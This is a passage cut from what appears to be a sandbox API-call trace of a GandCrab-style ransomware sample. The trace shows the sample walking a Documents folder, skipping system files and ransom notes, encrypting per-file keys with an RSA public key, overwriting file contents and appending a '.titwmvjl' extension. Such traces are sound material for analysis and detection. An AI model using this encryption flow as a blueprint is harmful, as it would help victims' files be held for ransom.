(lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx") returned 44 [0091.940] lstrlenW (lpString=".pptx") returned 5 [0091.940] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.940] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0091.940] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.940] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.940] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\t1cl1qp.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.941] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.941] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.941] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.941] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.942] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.942] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.942] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.942] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.942] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.942] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.943] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.943] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.943] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.943] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.943] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.944] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.944] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.944] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.944] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.944] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.944] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.945] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503278) returned 1 [0091.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.945] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.945] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.945] GetLastError () returned 0x0 [0091.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.946] CryptDestroyKey (hKey=0x503278) returned 1 [0091.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.946] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.946] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.946] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0091.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.947] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.947] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.947] GetLastError () returned 0x0 [0091.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.947] CryptDestroyKey (hKey=0x5036f8) returned 1 [0091.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.947] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.947] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.948] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.948] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xc436, lpOverlapped=0x0) returned 1 [0091.961] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff3bca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.961] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc436, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xc436, lpOverlapped=0x0) returned 1 [0091.963] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.964] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.968] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.968] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.968] CloseHandle (hObject=0x2ac) returned 1 [0091.969] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\t1cl1qp.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\t1cl1qp.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0091.970] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.970] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.970] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0091.970] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0091.970] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TITWMVJL-DECRYPT.txt" [0091.970] lstrlenW (lpString=".titwmvjl") returned 9 [0091.970] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TITWMVJL-DECRYPT.txt") returned 52 [0091.970] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.970] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 61 [0091.970] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TITWMVJL-DECRYPT.txt") returned 52 [0091.970] lstrlenW (lpString=".txt") returned 4 [0091.970] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.970] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0091.971] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0091.971] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.971] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TITWMVJL-DECRYPT.txt") returned 52 [0091.971] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TITWMVJL-DECRYPT.txt") returned 52 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0091.971] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0091.971] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.971] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.971] lstrcmpW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2=".") returned 1 [0091.971] lstrcmpW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="..") returned 1 [0091.971] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="TmFS9Ckm0dkXXbzGD5.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx" [0091.971] lstrlenW (lpString=".titwmvjl") returned 9 [0091.971] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx") returned 55 [0091.971] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.972] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx.titwmvjl") returned 64 [0091.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx") returned 55 [0091.972] lstrlenW (lpString=".docx") returned 5 [0091.972] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.972] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0091.972] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0091.972] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx") returned 55 [0091.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx") returned 55 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="desktop.ini") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="autorun.inf") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="ntuser.dat") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="iconcache.db") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="bootsect.bak") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="boot.ini") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="ntuser.dat.log") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="thumbs.db") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="ntldr") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="NTDETECT.COM") returned 1 [0091.972] lstrcmpiW (lpString1="TmFS9Ckm0dkXXbzGD5.docx", lpString2="Bootfont.bin") returned 1 [0091.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx") returned 55 [0091.972] lstrlenW (lpString=".docx") returned 5 [0091.973] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.973] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0091.973] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.973] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.973] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\tmfs9ckm0dkxxbzgd5.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.973] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.973] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.974] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.974] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.975] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.975] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.975] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.975] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.975] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.975] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.975] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.976] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.976] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.976] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.976] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.976] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.976] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.977] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.977] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037f8) returned 1 [0091.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.977] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.978] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.978] GetLastError () returned 0x0 [0091.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.978] CryptDestroyKey (hKey=0x5037f8) returned 1 [0091.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.978] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.978] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.979] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503238) returned 1 [0091.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.979] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.979] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.979] GetLastError () returned 0x0 [0091.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.979] CryptDestroyKey (hKey=0x503238) returned 1 [0091.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.980] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.980] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.980] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.980] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x1366a, lpOverlapped=0x0) returned 1 [0091.993] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffec996, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.993] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1366a, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x1366a, lpOverlapped=0x0) returned 1 [0092.000] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.001] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.004] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.005] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.005] CloseHandle (hObject=0x2ac) returned 1 [0092.006] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\tmfs9ckm0dkxxbzgd5.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\TmFS9Ckm0dkXXbzGD5.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\tmfs9ckm0dkxxbzgd5.docx.titwmvjl"), dwFlags=0x1) returned 1 [0092.007] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.007] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.007] lstrcmpW (lpString1="UeCPKGD3se3f1.docx", lpString2=".") returned 1 [0092.007] lstrcmpW (lpString1="UeCPKGD3se3f1.docx", lpString2="..") returned 1 [0092.007] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="UeCPKGD3se3f1.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx" [0092.007] lstrlenW (lpString=".titwmvjl") returned 9 [0092.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx") returned 50 [0092.007] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.007] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx.titwmvjl") returned 59 [0092.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx") returned 50 [0092.007] lstrlenW (lpString=".docx") returned 5 [0092.007] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.008] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0092.008] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0092.008] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.008] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx") returned 50 [0092.008] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx") returned 50 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="desktop.ini") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="autorun.inf") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="ntuser.dat") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="iconcache.db") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="bootsect.bak") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="boot.ini") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="ntuser.dat.log") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="thumbs.db") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="ntldr") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="NTDETECT.COM") returned 1 [0092.008] lstrcmpiW (lpString1="UeCPKGD3se3f1.docx", lpString2="Bootfont.bin") returned 1 [0092.008] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx") returned 50 [0092.008] lstrlenW (lpString=".docx") returned 5 